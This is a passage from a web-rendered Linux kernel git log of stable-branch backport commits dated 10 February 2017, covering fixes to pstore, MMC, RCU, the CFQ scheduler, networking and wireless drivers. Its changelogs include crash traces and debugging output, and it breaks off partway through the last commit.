1. 10 Feb, 2017 40 commits
    • Sebastian Andrzej Siewior's avatar
      pstore/core: drop cmpxchg based updates · 90efe9d4
      Sebastian Andrzej Siewior authored
      commit d5a9bf0b upstream.
      
      I have here a FPGA behind PCIe which exports SRAM which I use for
      pstore. Now it seems that the FPGA no longer supports cmpxchg based
      updates and writes back 0xff…ff and returns the same.  This leads to
      crash during crash rendering pstore useless.
      Since I doubt that there is much benefit from using cmpxchg() here, I am
      dropping this atomic access and use the spinlock based version.
      
      Cc: Anton Vorontsov <anton@enomsg.org>
      Cc: Colin Cross <ccross@android.com>
      Cc: Kees Cook <keescook@chromium.org>
      Cc: Tony Luck <tony.luck@intel.com>
      Cc: Rabin Vincent <rabinv@axis.com>
      Tested-by: default avatarRabin Vincent <rabinv@axis.com>
      Signed-off-by: default avatarSebastian Andrzej Siewior <bigeasy@linutronix.de>
      Reviewed-by: default avatarGuenter Roeck <linux@roeck-us.net>
      [kees: remove "_locked" suffix since it's the only option now]
      Signed-off-by: default avatarKees Cook <keescook@chromium.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      90efe9d4
    • Daniel Glöckner's avatar
      mmc: block: don't use CMD23 with very old MMC cards · 98af342b
      Daniel Glöckner authored
      commit 0ed50abb upstream.
      
      CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
      Older versions of the specification allowed to terminate
      multi-block transfers only with CMD12.
      
      The patch fixes the following problem:
      
        mmc0: new MMC card at address 0001
        mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
        mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
        ...
        blk_update_request: I/O error, dev mmcblk0, sector 0
        Buffer I/O error on dev mmcblk0, logical block 0, async page read
         mmcblk0: unable to read partition table
      Signed-off-by: default avatarDaniel Glöckner <dg@emlix.com>
      Signed-off-by: default avatarUlf Hansson <ulf.hansson@linaro.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      98af342b
    • Fabio Estevam's avatar
      mmc: mxs: Initialize the spinlock prior to using it · 0d9dddc0
      Fabio Estevam authored
      commit f91346e8 upstream.
      
      An interrupt may occur right after devm_request_irq() is called and
      prior to the spinlock initialization, leading to a kernel oops,
      as the interrupt handler uses the spinlock.
      
      In order to prevent this problem, move the spinlock initialization
      prior to requesting the interrupts.
      
      Fixes: e4243f13 (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
      Signed-off-by: default avatarFabio Estevam <fabio.estevam@nxp.com>
      Reviewed-by: default avatarMarek Vasut <marex@denx.de>
      Signed-off-by: default avatarUlf Hansson <ulf.hansson@linaro.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      0d9dddc0
    • Johan Hovold's avatar
      PM / sleep: fix device reference leak in test_suspend · 6d97f02a
      Johan Hovold authored
      commit ceb75787 upstream.
      
      Make sure to drop the reference taken by class_find_device() after
      opening the RTC device.
      
      Fixes: 77437fd4 (pm: boot time suspend selftest)
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarRafael J. Wysocki <rafael.j.wysocki@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      6d97f02a
    • Johan Hovold's avatar
      mfd: core: Fix device reference leak in mfd_clone_cell · 26b5a4a5
      Johan Hovold authored
      commit 722f1910 upstream.
      
      Make sure to drop the reference taken by bus_find_device_by_name()
      before returning from mfd_clone_cell().
      
      Fixes: a9bbba99 ("mfd: add platform_device sharing support for mfd")
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarLee Jones <lee.jones@linaro.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      26b5a4a5
    • Jaewon Kim's avatar
      ratelimit: fix bug in time interval by resetting right begin time · 479ce88b
      Jaewon Kim authored
      commit c2594bc3 upstream.
      
      rs->begin in ratelimit is set in two cases.
       1) when rs->begin was not initialized
       2) when rs->interval was passed
      
      For case #2, current ratelimit sets the begin to 0.  This incurrs
      improper suppression.  The begin value will be set in the next ratelimit
      call by 1).  Then the time interval check will be always false, and
      rs->printed will not be initialized.  Although enough time passed,
      ratelimit may return 0 if rs->printed is not less than rs->burst.  To
      reset interval properly, begin should be jiffies rather than 0.
      
      For an example code below:
      
          static DEFINE_RATELIMIT_STATE(mylimit, 1, 1);
          for (i = 1; i <= 10; i++) {
              if (__ratelimit(&mylimit))
                  printk("ratelimit test count %d\n", i);
              msleep(3000);
          }
      
      test result in the current code shows suppression even there is 3 seconds sleep.
      
        [  78.391148] ratelimit test count 1
        [  81.295988] ratelimit test count 2
        [  87.315981] ratelimit test count 4
        [  93.336267] ratelimit test count 6
        [  99.356031] ratelimit test count 8
        [ 105.376367] ratelimit test count 10
      Signed-off-by: default avatarJaewon Kim <jaewon31.kim@samsung.com>
      Signed-off-by: default avatarAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      479ce88b
    • Ding Tianhong's avatar
      rcu: Fix soft lockup for rcu_nocb_kthread · fe5080ab
      Ding Tianhong authored
      commit bedc1969 upstream.
      
      Carrying out the following steps results in a softlockup in the
      RCU callback-offload (rcuo) kthreads:
      
      1. Connect to ixgbevf, and set the speed to 10Gb/s.
      2. Use ifconfig to bring the nic up and down repeatedly.
      
      [  317.005148] IPv6: ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready
      [  368.106005] BUG: soft lockup - CPU#1 stuck for 22s! [rcuos/1:15]
      [  368.106005] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
      [  368.106005] task: ffff88057dd8a220 ti: ffff88057dd9c000 task.ti: ffff88057dd9c000
      [  368.106005] RIP: 0010:[<ffffffff81579e04>]  [<ffffffff81579e04>] fib_table_lookup+0x14/0x390
      [  368.106005] RSP: 0018:ffff88061fc83ce8  EFLAGS: 00000286
      [  368.106005] RAX: 0000000000000001 RBX: 00000000020155c0 RCX: 0000000000000001
      [  368.106005] RDX: ffff88061fc83d50 RSI: ffff88061fc83d70 RDI: ffff880036d11a00
      [  368.106005] RBP: ffff88061fc83d08 R08: 0000000000000001 R09: 0000000000000000
      [  368.106005] R10: ffff880036d11a00 R11: ffffffff819e0900 R12: ffff88061fc83c58
      [  368.106005] R13: ffffffff816154dd R14: ffff88061fc83d08 R15: 00000000020155c0
      [  368.106005] FS:  0000000000000000(0000) GS:ffff88061fc80000(0000) knlGS:0000000000000000
      [  368.106005] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
      [  368.106005] CR2: 00007f8c2aee9c40 CR3: 000000057b222000 CR4: 00000000000407e0
      [  368.106005] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
      [  368.106005] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
      [  368.106005] Stack:
      [  368.106005]  00000000010000c0 ffff88057b766000 ffff8802e380b000 ffff88057af03e00
      [  368.106005]  ffff88061fc83dc0 ffffffff815349a6 ffff88061fc83d40 ffffffff814ee146
      [  368.106005]  ffff8802e380af00 00000000e380af00 ffffffff819e0900 020155c0010000c0
      [  368.106005] Call Trace:
      [  368.106005]  <IRQ>
      [  368.106005]
      [  368.106005]  [<ffffffff815349a6>] ip_route_input_noref+0x516/0xbd0
      [  368.106005]  [<ffffffff814ee146>] ? skb_release_data+0xd6/0x110
      [  368.106005]  [<ffffffff814ee20a>] ? kfree_skb+0x3a/0xa0
      [  368.106005]  [<ffffffff8153698f>] ip_rcv_finish+0x29f/0x350
      [  368.106005]  [<ffffffff81537034>] ip_rcv+0x234/0x380
      [  368.106005]  [<ffffffff814fd656>] __netif_receive_skb_core+0x676/0x870
      [  368.106005]  [<ffffffff814fd868>] __netif_receive_skb+0x18/0x60
      [  368.106005]  [<ffffffff814fe4de>] process_backlog+0xae/0x180
      [  368.106005]  [<ffffffff814fdcb2>] net_rx_action+0x152/0x240
      [  368.106005]  [<ffffffff81077b3f>] __do_softirq+0xef/0x280
      [  368.106005]  [<ffffffff8161619c>] call_softirq+0x1c/0x30
      [  368.106005]  <EOI>
      [  368.106005]
      [  368.106005]  [<ffffffff81015d95>] do_softirq+0x65/0xa0
      [  368.106005]  [<ffffffff81077174>] local_bh_enable+0x94/0xa0
      [  368.106005]  [<ffffffff81114922>] rcu_nocb_kthread+0x232/0x370
      [  368.106005]  [<ffffffff81098250>] ? wake_up_bit+0x30/0x30
      [  368.106005]  [<ffffffff811146f0>] ? rcu_start_gp+0x40/0x40
      [  368.106005]  [<ffffffff8109728f>] kthread+0xcf/0xe0
      [  368.106005]  [<ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140
      [  368.106005]  [<ffffffff816147d8>] ret_from_fork+0x58/0x90
      [  368.106005]  [<ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140
      
      ==================================cut here==============================
      
      It turns out that the rcuos callback-offload kthread is busy processing
      a very large quantity of RCU callbacks, and it is not reliquishing the
      CPU while doing so.  This commit therefore adds an cond_resched_rcu_qs()
      within the loop to allow other tasks to run.
      
      [js] use onlu cond_resched() in 3.12
      Signed-off-by: default avatarDing Tianhong <dingtianhong@huawei.com>
      [ paulmck: Substituted cond_resched_rcu_qs for cond_resched. ]
      Signed-off-by: default avatarPaul E. McKenney <paulmck@linux.vnet.ibm.com>
      Cc: Dhaval Giani <dhaval.giani@oracle.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      fe5080ab
    • Dan Carpenter's avatar
      tools/vm/slabinfo: fix an unintentional printf · 9db8b648
      Dan Carpenter authored
      commit 2d6a4d64 upstream.
      
      The curly braces are missing here so we print stuff unintentionally.
      
      Fixes: 9da4714a ('slub: slabinfo update for cmpxchg handling')
      Link: http://lkml.kernel.org/r/20160715211243.GE19522@mwandaSigned-off-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Acked-by: default avatarChristoph Lameter <cl@linux.com>
      Cc: Sergey Senozhatsky <sergey.senozhatsky@gmail.com>
      Cc: Colin Ian King <colin.king@canonical.com>
      Cc: Laura Abbott <labbott@fedoraproject.org>
      Signed-off-by: default avatarAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      9db8b648
    • Daniel Mentz's avatar
      lib/genalloc.c: start search from start of chunk · f98c2c40
      Daniel Mentz authored
      commit 62e931fa upstream.
      
      gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
      a contiguous block of memory that satisfies the allocation request.
      
      The shortcut
      
      	if (size > atomic_read(&chunk->avail))
      		continue;
      
      makes the loop skip over chunks that do not have enough bytes left to
      fulfill the request.  There are two situations, though, where an
      allocation might still fail:
      
      (1) The available memory is not contiguous, i.e.  the request cannot
          be fulfilled due to external fragmentation.
      
      (2) A race condition.  Another thread runs the same code concurrently
          and is quicker to grab the available memory.
      
      In those situations, the loop calls pool->algo() to search the entire
      chunk, and pool->algo() returns some value that is >= end_bit to
      indicate that the search failed.  This return value is then assigned to
      start_bit.  The variables start_bit and end_bit describe the range that
      should be searched, and this range should be reset for every chunk that
      is searched.  Today, the code fails to reset start_bit to 0.  As a
      result, prefixes of subsequent chunks are ignored.  Memory allocations
      might fail even though there is plenty of room left in these prefixes of
      those other chunks.
      
      Fixes: 7f184275 ("lib, Make gen_pool memory allocator lockless")
      Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.comSigned-off-by: default avatarDaniel Mentz <danielmentz@google.com>
      Reviewed-by: default avatarMathieu Desnoyers <mathieu.desnoyers@efficios.com>
      Acked-by: default avatarWill Deacon <will.deacon@arm.com>
      Signed-off-by: default avatarAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      f98c2c40
    • Richard Weinberger's avatar
      drbd: Fix kernel_sendmsg() usage - potential NULL deref · 7a59aff6
      Richard Weinberger authored
      commit d8e9e5e8 upstream.
      
      Don't pass a size larger than iov_len to kernel_sendmsg().
      Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
      returns with rv < size.
      
      DRBD as external module has been around in the kernel 2.4 days already.
      We used to be compatible to 2.4 and very early 2.6 kernels,
      we used to use
       rv = sock_sendmsg(sock, &msg, iov.iov_len);
      then later changed to
       rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
      when we should have used
       rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
      
      tcp_sendmsg() used to totally ignore the size parameter.
       57be5bda ip: convert tcp_sendmsg() to iov_iter primitives
      changes that, and exposes our long standing error.
      
      Even with this error exposed, to trigger the bug, we would need to have
      an environment (config or otherwise) causing us to not use sendpage()
      for larger transfers, a failing connection, and have it fail "just at the
      right time".  Apparently that was unlikely enough for most, so this went
      unnoticed for years.
      
      Still, it is known to trigger at least some of these,
      and suspected for the others:
      [0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
      [1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
      [2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
      [3] https://ubuntuforums.org/showthread.php?t=2336150
      [4] http://e2.howsolveproblem.com/i/1175162/
      
      This should go into 4.9,
      and into all stable branches since and including v4.0,
      which is the first to contain the exposing change.
      
      It is correct for all stable branches older than that as well
      (which contain the DRBD driver; which is 2.6.33 and up).
      
      It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
      we dropped the comment block immediately preceding the kernel_sendmsg().
      
      Fixes: b411b363 ("The DRBD driver")
      Cc: viro@zeniv.linux.org.uk
      Cc: christoph.lechleitner@iteg.at
      Cc: wolfgang.glas@iteg.at
      Reported-by: default avatarChristoph Lechleitner <christoph.lechleitner@iteg.at>
      Tested-by: default avatarChristoph Lechleitner <christoph.lechleitner@iteg.at>
      Signed-off-by: default avatarRichard Weinberger <richard@nod.at>
      [changed oneliner to be "obvious" without context; more verbose message]
      Signed-off-by: default avatarLars Ellenberg <lars.ellenberg@linbit.com>
      Signed-off-by: default avatarJens Axboe <axboe@fb.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      7a59aff6
    • Glauber Costa's avatar
      cfq: fix starvation of asynchronous writes · 5dd23e67
      Glauber Costa authored
      commit 3932a86b upstream.
      
      While debugging timeouts happening in my application workload (ScyllaDB), I have
      observed calls to open() taking a long time, ranging everywhere from 2 seconds -
      the first ones that are enough to time out my application - to more than 30
      seconds.
      
      The problem seems to happen because XFS may block on pending metadata updates
      under certain circumnstances, and that's confirmed with the following backtrace
      taken by the offcputime tool (iovisor/bcc):
      
          ffffffffb90c57b1 finish_task_switch
          ffffffffb97dffb5 schedule
          ffffffffb97e310c schedule_timeout
          ffffffffb97e1f12 __down
          ffffffffb90ea821 down
          ffffffffc046a9dc xfs_buf_lock
          ffffffffc046abfb _xfs_buf_find
          ffffffffc046ae4a xfs_buf_get_map
          ffffffffc046babd xfs_buf_read_map
          ffffffffc0499931 xfs_trans_read_buf_map
          ffffffffc044a561 xfs_da_read_buf
          ffffffffc0451390 xfs_dir3_leaf_read.constprop.16
          ffffffffc0452b90 xfs_dir2_leaf_lookup_int
          ffffffffc0452e0f xfs_dir2_leaf_lookup
          ffffffffc044d9d3 xfs_dir_lookup
          ffffffffc047d1d9 xfs_lookup
          ffffffffc0479e53 xfs_vn_lookup
          ffffffffb925347a path_openat
          ffffffffb9254a71 do_filp_open
          ffffffffb9242a94 do_sys_open
          ffffffffb9242b9e sys_open
          ffffffffb97e42b2 entry_SYSCALL_64_fastpath
          00007fb0698162ed [unknown]
      
      Inspecting my run with blktrace, I can see that the xfsaild kthread exhibit very
      high "Dispatch wait" times, on the dozens of seconds range and consistent with
      the open() times I have saw in that run.
      
      Still from the blktrace output, we can after searching a bit, identify the
      request that wasn't dispatched:
      
        8,0   11      152    81.092472813   804  A  WM 141698288 + 8 <- (8,1) 141696240
        8,0   11      153    81.092472889   804  Q  WM 141698288 + 8 [xfsaild/sda1]
        8,0   11      154    81.092473207   804  G  WM 141698288 + 8 [xfsaild/sda1]
        8,0   11      206    81.092496118   804  I  WM 141698288 + 8 (   22911) [xfsaild/sda1]
        <==== 'I' means Inserted (into the IO scheduler) ===================================>
        8,0    0   289372    96.718761435     0  D  WM 141698288 + 8 (15626265317) [swapper/0]
        <==== Only 15s later the CFQ scheduler dispatches the request ======================>
      
      As we can see above, in this particular example CFQ took 15 seconds to dispatch
      this request. Going back to the full trace, we can see that the xfsaild queue
      had plenty of opportunity to run, and it was selected as the active queue many
      times. It would just always be preempted by something else (example):
      
        8,0    1        0    81.117912979     0  m   N cfq1618SN / insert_request
        8,0    1        0    81.117913419     0  m   N cfq1618SN / add_to_rr
        8,0    1        0    81.117914044     0  m   N cfq1618SN / preempt
        8,0    1        0    81.117914398     0  m   N cfq767A  / slice expired t=1
        8,0    1        0    81.117914755     0  m   N cfq767A  / resid=40
        8,0    1        0    81.117915340     0  m   N / served: vt=1948520448 min_vt=1948520448
        8,0    1        0    81.117915858     0  m   N cfq767A  / sl_used=1 disp=0 charge=0 iops=1 sect=0
      
      where cfq767 is the xfsaild queue and cfq1618 corresponds to one of the ScyllaDB
      IO dispatchers.
      
      The requests preempting the xfsaild queue are synchronous requests. That's a
      characteristic of ScyllaDB workloads, as we only ever issue O_DIRECT requests.
      While it can be argued that preempting ASYNC requests in favor of SYNC is part
      of the CFQ logic, I don't believe that doing so for 15+ seconds is anyone's
      goal.
      
      Moreover, unless I am misunderstanding something, that breaks the expectation
      set by the "fifo_expire_async" tunable, which in my system is set to the
      default.
      
      Looking at the code, it seems to me that the issue is that after we make
      an async queue active, there is no guarantee that it will execute any request.
      
      When the queue itself tests if it cfq_may_dispatch() it can bail if it sees SYNC
      requests in flight. An incoming request from another queue can also preempt it
      in such situation before we have the chance to execute anything (as seen in the
      trace above).
      
      This patch sets the must_dispatch flag if we notice that we have requests
      that are already fifo_expired. This flag is always cleared after
      cfq_dispatch_request() returns from cfq_dispatch_requests(), so it won't pin
      the queue for subsequent requests (unless they are themselves expired)
      
      Care is taken during preempt to still allow rt requests to preempt us
      regardless.
      
      Testing my workload with this patch applied produces much better results.
      From the application side I see no timeouts, and the open() latency histogram
      generated by systemtap looks much better, with the worst outlier at 131ms:
      
      Latency histogram of xfs_buf_lock acquisition (microseconds):
       value |-------------------------------------------------- count
           0 |                                                     11
           1 |@@@@                                                161
           2 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  1966
           4 |@                                                    54
           8 |                                                     36
          16 |                                                      7
          32 |                                                      0
          64 |                                                      0
             ~
        1024 |                                                      0
        2048 |                                                      0
        4096 |                                                      1
        8192 |                                                      1
       16384 |                                                      2
       32768 |                                                      0
       65536 |                                                      0
      131072 |                                                      1
      262144 |                                                      0
      524288 |                                                      0
      Signed-off-by: default avatarGlauber Costa <glauber@scylladb.com>
      CC: Jens Axboe <axboe@kernel.dk>
      CC: linux-block@vger.kernel.org
      CC: linux-kernel@vger.kernel.org
      Signed-off-by: default avatarGlauber Costa <glauber@scylladb.com>
      Signed-off-by: default avatarJens Axboe <axboe@fb.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      5dd23e67
    • Willy Tarreau's avatar
      Revert "ipc/sem.c: optimize sem_lock()" · 3d971ee1
      Willy Tarreau authored
      This reverts commit 901f6fed
      (upstream commit 6d07b68c).
      
      As suggested in commit 5864a2fd
      (ipc/sem.c: fix complex_count vs. simple op race) since it introduces
      a regression and the candidate fix requires too many changes for 3.10.
      
      Cc: Manfred Spraul <manfred@colorfullife.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3d971ee1
    • Michal Hocko's avatar
      kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd · 9c559b0f
      Michal Hocko authored
      commit 735f2770 upstream.
      
      Commit fec1d011 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal
      exit") has caused a subtle regression in nscd which uses
      CLONE_CHILD_CLEARTID to clear the nscd_certainly_running flag in the
      shared databases, so that the clients are notified when nscd is
      restarted.  Now, when nscd uses a non-persistent database, clients that
      have it mapped keep thinking the database is being updated by nscd, when
      in fact nscd has created a new (anonymous) one (for non-persistent
      databases it uses an unlinked file as backend).
      
      The original proposal for the CLONE_CHILD_CLEARTID change claimed
      (https://lkml.org/lkml/2006/10/25/233):
      
      : The NPTL library uses the CLONE_CHILD_CLEARTID flag on clone() syscalls
      : on behalf of pthread_create() library calls.  This feature is used to
      : request that the kernel clear the thread-id in user space (at an address
      : provided in the syscall) when the thread disassociates itself from the
      : address space, which is done in mm_release().
      :
      : Unfortunately, when a multi-threaded process incurs a core dump (such as
      : from a SIGSEGV), the core-dumping thread sends SIGKILL signals to all of
      : the other threads, which then proceed to clear their user-space tids
      : before synchronizing in exit_mm() with the start of core dumping.  This
      : misrepresents the state of process's address space at the time of the
      : SIGSEGV and makes it more difficult for someone to debug NPTL and glibc
      : problems (misleading him/her to conclude that the threads had gone away
      : before the fault).
      :
      : The fix below is to simply avoid the CLONE_CHILD_CLEARTID action if a
      : core dump has been initiated.
      
      The resulting patch from Roland (https://lkml.org/lkml/2006/10/26/269)
      seems to have a larger scope than the original patch asked for.  It
      seems that limitting the scope of the check to core dumping should work
      for SIGSEGV issue describe above.
      
      [Changelog partly based on Andreas' description]
      Fixes: fec1d011 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit")
      Link: http://lkml.kernel.org/r/1471968749-26173-1-git-send-email-mhocko@kernel.orgSigned-off-by: default avatarMichal Hocko <mhocko@suse.com>
      Tested-by: default avatarWilliam Preston <wpreston@suse.com>
      Acked-by: default avatarOleg Nesterov <oleg@redhat.com>
      Cc: Roland McGrath <roland@hack.frob.com>
      Cc: Andreas Schwab <schwab@suse.com>
      Signed-off-by: default avatarAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      9c559b0f
    • Steven Rostedt (Red Hat)'s avatar
      tracing: Move mutex to protect against resetting of seq data · 0d75118c
      Steven Rostedt (Red Hat) authored
      commit 1245800c upstream.
      
      The iter->seq can be reset outside the protection of the mutex. So can
      reading of user data. Move the mutex up to the beginning of the function.
      
      Fixes: d7350c3f ("tracing/core: make the read callbacks reentrants")
      Reported-by: default avatarAl Viro <viro@ZenIV.linux.org.uk>
      Signed-off-by: default avatarSteven Rostedt <rostedt@goodmis.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      0d75118c
    • Oliver Neukum's avatar
      kaweth: fix firmware download · a1f5e915
      Oliver Neukum authored
      commit 60bcabd0 upstream.
      
      This fixes the oops discovered by the Umap2 project and Alan Stern.
      The intf member needs to be set before the firmware is downloaded.
      Signed-off-by: default avatarOliver Neukum <oneukum@suse.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      a1f5e915
    • Jeremy Linton's avatar
      net: sky2: Fix shutdown crash · c9dade91
      Jeremy Linton authored
      commit 06ba3b21 upstream.
      
      The sky2 frequently crashes during machine shutdown with:
      
      sky2_get_stats+0x60/0x3d8 [sky2]
      dev_get_stats+0x68/0xd8
      rtnl_fill_stats+0x54/0x140
      rtnl_fill_ifinfo+0x46c/0xc68
      rtmsg_ifinfo_build_skb+0x7c/0xf0
      rtmsg_ifinfo.part.22+0x3c/0x70
      rtmsg_ifinfo+0x50/0x5c
      netdev_state_change+0x4c/0x58
      linkwatch_do_dev+0x50/0x88
      __linkwatch_run_queue+0x104/0x1a4
      linkwatch_event+0x30/0x3c
      process_one_work+0x140/0x3e0
      worker_thread+0x60/0x44c
      kthread+0xdc/0xf0
      ret_from_fork+0x10/0x50
      
      This is caused by the sky2 being called after it has been shutdown.
      A previous thread about this can be found here:
      
      https://lkml.org/lkml/2016/4/12/410
      
      An alternative fix is to assure that IFF_UP gets cleared by
      calling dev_close() during shutdown. This is similar to what the
      bnx2/tg3/xgene and maybe others are doing to assure that the driver
      isn't being called following _shutdown().
      Signed-off-by: default avatarJeremy Linton <jeremy.linton@arm.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      c9dade91
    • Eli Cooper's avatar
      ipv4: Set skb->protocol properly for local output · 85801b79
      Eli Cooper authored
      commit f4180439 upstream.
      
      When xfrm is applied to TSO/GSO packets, it follows this path:
      
          xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()
      
      where skb_gso_segment() relies on skb->protocol to function properly.
      
      This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
      fixing a bug where GSO packets sent through a sit tunnel are dropped
      when xfrm is involved.
      Signed-off-by: default avatarEli Cooper <elicooper@gmx.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      85801b79
    • Brian Norris's avatar
      mwifiex: printk() overflow with 32-byte SSIDs · 3cc6c6bd
      Brian Norris authored
      commit fcd2042e upstream.
      
      SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
      when we print them out.
      
      This can be easily noticed by connecting to a network with a 32-octet
      SSID:
      
      [ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
      '0123456789abcdef0123456789abcdef <uninitialized mem>' bssid
      xx:xx:xx:xx:xx:xx
      
      Fixes: 5e6e3a92 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
      Signed-off-by: default avatarBrian Norris <briannorris@chromium.org>
      Acked-by: default avatarAmitkumar Karwar <akarwar@marvell.com>
      Signed-off-by: default avatarKalle Valo <kvalo@codeaurora.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3cc6c6bd
    • Johannes Berg's avatar
      cfg80211: limit scan results cache size · 98db9446
      Johannes Berg authored
      commit 9853a55e upstream.
      
      It's possible to make scanning consume almost arbitrary amounts
      of memory, e.g. by sending beacon frames with random BSSIDs at
      high rates while somebody is scanning.
      
      Limit the number of BSS table entries we're willing to cache to
      1000, limiting maximum memory usage to maybe 4-5MB, but lower
      in practice - that would be the case for having both full-sized
      beacon and probe response frames for each entry; this seems not
      possible in practice, so a limit of 1000 entries will likely be
      closer to 0.5 MB.
      Signed-off-by: default avatarJohannes Berg <johannes.berg@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      98db9446
    • Johannes Berg's avatar
      mac80211: discard multicast and 4-addr A-MSDUs · f862950d
      Johannes Berg authored
      commit ea720935 upstream.
      
      In mac80211, multicast A-MSDUs are accepted in many cases that
      they shouldn't be accepted in:
       * drop A-MSDUs with a multicast A1 (RA), as required by the
         spec in 9.11 (802.11-2012 version)
       * drop A-MSDUs with a 4-addr header, since the fourth address
         can't actually be useful for them; unless 4-address frame
         format is actually requested, even though the fourth address
         is still not useful in this case, but ignored
      
      Accepting the first case, in particular, is very problematic
      since it allows anyone else with possession of a GTK to send
      unicast frames encapsulated in a multicast A-MSDU, even when
      the AP has client isolation enabled.
      Signed-off-by: default avatarJohannes Berg <johannes.berg@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      f862950d
    • Felix Fietkau's avatar
      mac80211: fix purging multicast PS buffer queue · 293573d9
      Felix Fietkau authored
      commit 6b07d9ca upstream.
      
      The code currently assumes that buffered multicast PS frames don't have
      a pending ACK frame for tx status reporting.
      However, hostapd sends a broadcast deauth frame on teardown for which tx
      status is requested. This can lead to the "Have pending ack frames"
      warning on module reload.
      Fix this by using ieee80211_free_txskb/ieee80211_purge_tx_queue.
      Signed-off-by: default avatarFelix Fietkau <nbd@nbd.name>
      Signed-off-by: default avatarJohannes Berg <johannes.berg@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      293573d9
    • Stephen Suryaputra Lin's avatar
      ipv4: use new_gw for redirect neigh lookup · 3816ef44
      Stephen Suryaputra Lin authored
      commit 969447f2 upstream.
      
      In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
      and then the state of the neigh for the new_gw is checked. If the state
      isn't valid then the redirected route is deleted. This behavior is
      maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
      is assigned to peer->redirect_learned.a4 before calling
      ipv4_neigh_lookup().
      
      After commit 5943634f ("ipv4: Maintain redirect and PMTU info in
      struct rtable again."), ipv4_neigh_lookup() is performed without the
      rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
      isn't zero, the function uses it as the key. The neigh is most likely
      valid since the old_gw is the one that sends the ICMP redirect message.
      Then the new_gw is assigned to fib_nh_exception. The problem is: the
      new_gw ARP may never gets resolved and the traffic is blackholed.
      
      So, use the new_gw for neigh lookup.
      
      Changes from v1:
       - use __ipv4_neigh_lookup instead (per Eric Dumazet).
      
      Fixes: 5943634f ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
      Signed-off-by: default avatarStephen Suryaputra Lin <ssurya@ieee.org>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3816ef44
    • WANG Cong's avatar
      neigh: check error pointer instead of NULL for ipv4_neigh_lookup() · 4d4c1fc6
      WANG Cong authored
      commit 2c1a4311 upstream.
      
      Fixes: commit f187bc6e ("ipv4: No need to set generic neighbour pointer")
      Cc: David S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarCong Wang <xiyou.wangcong@gmail.com>
